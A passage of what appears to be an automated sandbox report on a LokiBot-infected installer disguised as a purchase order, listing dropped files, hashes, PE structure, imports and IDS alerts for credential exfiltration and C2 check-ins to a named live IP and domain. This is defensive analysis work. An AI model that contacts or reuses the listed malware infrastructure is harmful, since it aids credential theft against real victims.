                  high
                  http://nsis.sf.net/NSIS_ErrorErrorPurchase Order #5000012803.exefalse
                    high
                    http://www.ibsensoftware.com/Purchase Order #5000012803.exe, Purchase Order #5000012803.exe, 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Purchase Order #5000012803.exe, 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    104.223.93.105
                    slimpackage.comUnited States
                    8100ASN-QUADRANET-GLOBALUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:553040
                    Start date:14.01.2022
                    Start time:07:14:14
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:Purchase Order #5000012803.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:17
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/6@61/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 89.7% (good quality ratio 87%)
                    • Quality average: 80.7%
                    • Quality standard deviation: 26.7%
                    HCA Information:
                    • Successful, ratio: 88%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: Purchase Order #5000012803.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:15:17API Interceptor58x Sleep call for process: Purchase Order #5000012803.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nnrr3w4buo
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):218882
                    Entropy (8bit):7.98965789846215
                    Encrypted:false
                    SSDEEP:6144:V9SOcYwR2fG8tEOnw6X/7CZJTrxSciuvI:DwEfLw6TCZpEyg
                    MD5:50A68BA520B64A2483798C97E223435F
                    SHA1:CBEAB844A1C3EAC2EB8ABE5DEF847A05FF9F7D5B
                    SHA-256:CD06A2C3858AC3B1BC6D06816DD2966154EABAB479C4B305521A84A5B409D6D7
                    SHA-512:8C604F64FE76D320D6749B9E36B3139E870534A4E0D159D5DF74A19CB5D5736A6215EFE95B7C8AFCC111521E107170C6B86F129385CD7B313C09331E7B53B84A
                    Malicious:false
                    Reputation:low
                    Preview: *8..6>.E.[L.a.....N.<s`3......|.}..).=A.}u..X.z......_k.5.Q...6;<Muz.L.....8F..Z...`^....Ys.tsnEF_X.W..5.p=..hmA..o....+V..;b..q.U.a......|4P..=.CD.....].w.[..N77f.3Wn.e../R..Ns.7...i...{*0eaxJ=X.e...g./Pw.R.....9..O......r.,..6...!.....74j..m7....fl...6A. w.L....KN.N.<s`.....}.|.1..).k=A.}u..X.S.q....jkR5KQ...A/BM.ID1$...K.s..ar.].......m^5.....0?yff>Q..^Q+....+....+V..;b.03eKDK=/...N564.@.a.. .(.L[A....aj,....q.D;...N........&...o.....hM*.V02.r.....iMz..Ry.....\jGK.x.~...!.....nh|jvq....fl...6>...[L*..M. 3n..s`.P...o.|...)vs=A.}u..X.z........Z.Q..._ABM#.D1....c....mr........._^.e....0?yf.>Q..`Q....,6....+V..;b.03eKDK./...N564.@.a.. .(.L[A....aj,....q.D;...N........&...o.....x.*.V02.r.....iMz..Ry.....\jGK..6...!.UD..ns|jv......fl...6>...[L....K..N.<s`{......|.}..).=A.}u..X.z......_k.5KQ....IBM.ID1$...K....mr........._^5.....0?yff>Q..^Q....,+....+V..;b.03eKDK=/...N564.@.a.. .(.L[A....aj,....q.D;...N........&...o.....x.*.V02.r.....iMz..Ry.....\jGK.
                    C:\Users\user\AppData\Local\Temp\nsgB0D.tmp
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):258678
                    Entropy (8bit):7.663931493685321
                    Encrypted:false
                    SSDEEP:6144:RS9SOcYwR2fG8tEOnw6X/7CZJTrxSciuvfN+:IwEfLw6TCZpEyXN
                    MD5:D993ADA5E7AEC7FDC7E5E62E31832EF9
                    SHA1:A7F68AC213855C6C80D38241F16076213724983F
                    SHA-256:918F6A726FBC8424E71E8B8CAF11E67B9B41D0DDC5C9C5DABA4B36889CB1D854
                    SHA-512:B955E01EFE5AD701396D5987A6545A896B8BB9FC2F34B10F03879648EDC3588AACDD74F6FD6C43B20A5BF89C0F99CFB71F79EB789E61DE77975148F86249AA14
                    Malicious:false
                    Reputation:low
                    Preview: .u......,.......................0Z.......u.......u..............................................................Z...........................................................................................................................................................................J...................j..............................................................................................................................._...........{...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):4.1417181736612125
                    Encrypted:false
                    SSDEEP:48:SpozIU0jblvgiPtv6UIkuW2yH+ZsQMR7/iItlRuqS:ZzWdvZNFuoH+Zdc5x
                    MD5:B70AAC2FFA041468D92918145535C5C7
                    SHA1:26F134E72D8E5C86209A54E0D05D801C1B193059
                    SHA-256:97ACCD2E535507EEAD8DA6CCDB641907134E527B19F9C64D6EF9071BFA508D66
                    SHA-512:561B10896C3539B87AA2C94CDAB5CEEC0379E56C4E949651ACDD114CEEFF18A1E3DD1A5E68E792D37B54BC47036395BF1ED883D852B5C03E3D8CB01CEFBD179A
                    Malicious:false
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x-2..Ca..Ca..CaZ.Ma..Ca..B`..Ca..Ba..Ca.lG`..Ca.lC`..Ca.l.a..Ca.lA`..CaRich..Ca........PE..L...C..a...........!......................... ...............................P............@.......................... ..H....!.......0.......................@..\.................................................... ...............................text............................... ..`.rdata..h.... ......................@..@.rsrc........0......................@..@.reloc..\....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\urpwvqane
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4972
                    Entropy (8bit):6.15619113991577
                    Encrypted:false
                    SSDEEP:96:Qm5+Ry+S1+aC5s+wjskAi0eXcKm5Z3p/yEaMr1L7h0MQOYRzJNUxwKjj:QmEI+S1dUs+hkAixMKA3padOYBJNUuKn
                    MD5:C7420C4BF0D9B154AF363B48CC160AD0
                    SHA1:D3C95A22A44E515830B925A2FC30B5FA6A0C628E
                    SHA-256:CAF8F4FFCA95FE9A5336A64B83554AEA6D37586A159F467D868E25F3737B4FB4
                    SHA-512:530FDA9B005576B408497D7B9E096B0CD526EA62B5D32039E4DE3CC3CEF1FCFABA2B7BB737C9662A4D0B990C7C0AAD673613BD83B56A66BCE1AC7D855E344F9C
                    Malicious:false
                    Reputation:low
                    Preview: .....TF.N.-^WRNd..R.g.....R.g....Nd....%...Nd...4..4.<........8..8T..4..4.<........8.}8T..4..4.<........8..8Ty.4..4.<.......8..8T.Nl..7+[.Uf.....H8..8T.F..N...x8..8..F..F..<....[....F...T.<..8..RW8d.N..[......N.!.&d..4...4}..4..U.4....4...4..D.1.b.F..b.8...N..4..4...F...8...d.......!.....N.!..Fd...F....VF.....TF.PP.R.g....F..F....>.F..F.F..F..8T.F...8..F..F.-F..8.F..FT.F.....e..j.5...._.....eg.j.g..........e...j.Q..........TF.N.%.R.g..........<..8..Nl..1.F....F..-8..F...8.........D.1.F..H[..fx.8...8Q..<..H[.....8...8Q..[.[.Uf..<....eg.j...........8...<....4......8..Nl..1.Nd..........F..F.....TF.N.-.R.g......%...<..8..Nl..1.F....F..-8..F...8.....n...D..A;...F..H[..fx.8...8Q..F..H[.....8...8Q..F..H[....8...8Q..F...x[..f..8...8...<..H[.....8...8Q..[.[.Uf..<...e..j...........8..Nl..1.F..F..8....4..4..4..4..4......8..Nl..1.Nd..........F..F.....TF.N........<..8..Nl..1.F....F..-8..F...8.....[...D.1.F..H[..fx.8...8Q..F..H[.....8...8Q..[.[.Uf..<....e...j.".....!...8....4
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:D898504A722BFF1524134C6AB6A5EAA5
                    SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                    SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                    SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ..............................................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.8958885048982035
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Purchase Order #5000012803.exe
                    File size:247015
                    MD5:d62b8a5fdb90e9241ff0eef6ea035e32
                    SHA1:4e9e38dc4d01a649d927a933488477c5980fcb18
                    SHA256:95f5680fe4d7830a393aa84b2278051638f3c8105766c47a68c1f8981f38932b
                    SHA512:5878e0ab7e76e508499f14c077192a235a73312edaa030d0999370df6c82be56212e4258da19a8cf8f3417d0da8ba20b3e166e0b58611fc44194df2964e863fe
                    SSDEEP:6144:kw/b88QHR5lvQ2urEmJzKlf78z1++UPkq4Y1ROwy:HoRbQ2ugoz87oUPkqEwy
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                    File Icon

                    Icon Hash:ecccccd4d4e8e096

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F2930996230h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F2930995EE7h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F2930995ED5h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F29309936FCh
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F29309959C8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F2930993755h
                    cmp cl, 00000020h
                    jne 00007F29309936F8h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F29309936ECh
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x2528.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x2c0000x25280x2600False0.407072368421data5.36381099372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x2c1f00x10a8dataEnglishUnited States
                    RT_ICON0x2d2980x988dataEnglishUnited States
                    RT_ICON0x2dc200x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                    RT_DIALOG0x2e0880x100dataEnglishUnited States
                    RT_DIALOG0x2e1880x11cdataEnglishUnited States
                    RT_DIALOG0x2e2a80x60dataEnglishUnited States
                    RT_GROUP_ICON0x2e3080x30dataEnglishUnited States
                    RT_MANIFEST0x2e3380x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                    Imports

                    DLLImport
                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    01/14/22-07:15:14.068204TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976580192.168.2.4104.223.93.105
                    01/14/22-07:15:14.068204TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.4104.223.93.105
                    01/14/22-07:15:14.068204TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.4104.223.93.105
                    01/14/22-07:15:14.068204TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976580192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976680192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976680192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.4104.223.93.105
                    01/14/22-07:15:25.808698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.4104.223.93.105
                    01/14/22-07:15:25.808698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.4104.223.93.105
                    01/14/22-07:15:25.808698TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.4104.223.93.105
                    01/14/22-07:15:25.808698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.4104.223.93.105
                    01/14/22-07:15:27.597120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.4104.223.93.105
                    01/14/22-07:15:28.997592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.4104.223.93.105
                    01/14/22-07:15:30.454419TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.4104.223.93.105
                    01/14/22-07:15:31.824330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.4104.223.93.105
                    01/14/22-07:15:33.100123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.4104.223.93.105
                    01/14/22-07:15:35.394366TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.4104.223.93.105
                    01/14/22-07:15:37.781119TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.4104.223.93.105
                    01/14/22-07:15:40.339953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.4104.223.93.105
                    01/14/22-07:15:43.210044TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.4104.223.93.105
